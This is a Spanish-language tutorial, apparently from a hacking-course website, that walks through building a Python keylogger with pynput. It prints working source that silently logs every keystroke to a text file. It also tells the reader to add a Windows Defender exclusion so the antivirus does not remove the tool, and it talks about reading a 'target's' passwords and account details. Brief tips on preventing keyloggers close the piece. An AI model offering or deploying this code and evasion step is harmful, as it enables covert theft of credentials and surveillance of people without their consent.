😎 60% Descuento:  Curso de Hacking Redes Inalámbricas >> Ver Más

Cómo crear un registrador de teclas (keylogger) – Tutorial educativo

Antes de crear este proyecto educativo, es necesario analizar qué es un keylogger. 

Un keylogger puede ser un hardware o software que puede registrar las pulsaciones de teclas mientras escribes en un teclado. Este te permite ver, entre otras cosas, contraseñas y nombres de usuarios de cuentas (es decir, cuentas bancarias, correo electrónico, etc.), búsquedas de Google, conversaciones que pueden usarse para extorsionar dinero o más información de un objetivo, entre otros. . 

Los ciberdelincuentes crean sitios web falsos o envían un correo electrónico adjuntando el keylogger en un enlace malicioso o en un archivo adjunto descargable conocido como ataque de phishing. Todos debemos saber qué es un keylogger y cómo protegernos a nosotros mismos.

En este artículo, crearé un script de Python que nos servirá como keylogger para registrar las pulsaciones de teclas en un archivo de texto. Podríamos utilizar el script que puedes ver en el siguiente video, que además analiza cada línea del script.

Si al igual que yo, viste el video y te emocionaste por crear y ejecutar un keylogger, seguramente te decepcionaste. Desafortunadamente, este script no funcionó para mí. El script me mostraba un error cuando lo ejecutaba. Sin embargo, podemos crear uno funcional. 

Por lo tanto, decidí buscar un script de Python que fuera un poco más fácil de entender. 

Creando el script

Estos son los pasos para crear un Keylogger solo con fines educativos:

1. Asegúrate de tener Python o un IDE instalado en tu computadora.

¿Qué es un IDE? Un entorno de desarrollo integrado (IDE) es un software que los programadores utilizan para escribir código. Ejemplos de IDE son Visual Studio, NetBeans, Eclipse, IntelliJ, etc. 

Puedes usar cualquier IDE con el que te sientas cómodo. En este proyecto, utilicé atom.io. Puedes descargarlo aquí. Debido a que atom.io no tiene Python instalado dentro de la aplicación, instalé Python en mi computadora. Puedes descargar Python aquí si no lo tienes instalado.

2. Instalar pynput usando el comando pip install pynput. Puedes saber que pynput está instalado como se ve en la imagen a continuación. Si pip no funciona, prueba el comando: pip3 install pynput

Necesitamos pynput porque registra la entrada del usuario, también conocida como pulsaciones de teclas. Además, pynput contiene paquetes que monitorean el teclado. Esta es una característica importante para el keylogger.

3. Opcional: si estás trabajando en una computadora con Windows, dirígete a la configuración. En la barra de búsqueda, escribe protección contra virus y amenazas. En Protección contra virus y amenazas, haz clic en administrar configuración y desplázate hacia abajo hasta que veas las exclusiones. En exclusiones, haz clic en agregar o eliminar exclusiones y agregar. A continuación, haz clic en agregar exclusiones. Verás un menú desplegable y una carpeta seleccionada. Agrega la carpeta que contiene tu keylogger. Esto evita que tu computadora piense que el keylogger que creaste es una amenaza. Además, evita que la computadora elimine el archivo después de que se haya ejecutado el keylogger.

Usando el script

4. Después de instalar Python, atom.io y pynput en mi computadora, copié el script de Python y creé un archivo Keylogger.py en atom.io. Puedes encontrar el script de Python a continuación.

import pynput
from pynput.keyboard import Key, Listener
import logging

log_dir = r"C:/users/himanshu/"
logging.basicConfig(filename = (log_dir + "keyLog.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
   logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

5. En mi caso usé el símbolo del sistema y escribí el comando: python3 keylogger.py. Asegúrate de estar en la carpeta donde se encuentra el script registrador de teclas antes de ejecutar esta secuencia de comandos.

Cuando ejecutes este script, no se abrirá ninguna ventana nueva que indique que el script se está ejecutando. En su lugar, verás que aparece un archivo keylogger.txt en el directorio de tu script de Python Keylogger. Este script usa pynput para registrar las pulsaciones de teclas en la computadora de tu objetivo y registra las pulsaciones de teclas en un archivo de texto. Puedes abrir el archivo de texto keylogger.txt y ver cada pulsación de tecla realizada en la computadora de destino.

A continuación, algunas fotos de cuando ejecuté el script Keylogger

La siguiente imagen muestra el script de Python que se utilizó para crear el registrador de pulsaciones de teclas. Básicamente, este script de Python usa pynput para registrar las pulsaciones de teclas y las guarda en un archivo de texto.

En la imagen a continuación, ejecuté el script en mi símbolo del sistema usando el comando: python3 Keylogger.py. El script de python es un archivo que hice usando el IDE, atom.io. Cuando ejecutas el comando, aparece un archivo keylog.txt que registra las pulsaciones de teclas.

Esta imagen a continuación muestra los registros de pulsaciones de teclas cuando el script estaba activo.

Conclusiones

Ahora, has observado el script del keylogger y viste lo peligroso que puede ser. Con suerte, estarás pensando en cómo defenderte contra él. Recuerda, los ciberataques son inevitables. 

Aquí hay algunas formas de prevenir ataques de keylogger:

  • No descargues ningún archivo desconocido
  • Instalar software antivirus
  • Habilitar la autenticación de dos factores
  • Considera un teclado virtual
  • Usar administrador de contraseñas
  • Considera el software de conversión de voz a texto
Deja un comentario

Adquiere tu Membresía Anual Wiser

Adquiere tu Membresía Anual Wiser y adquiere grandes beneficios

Más información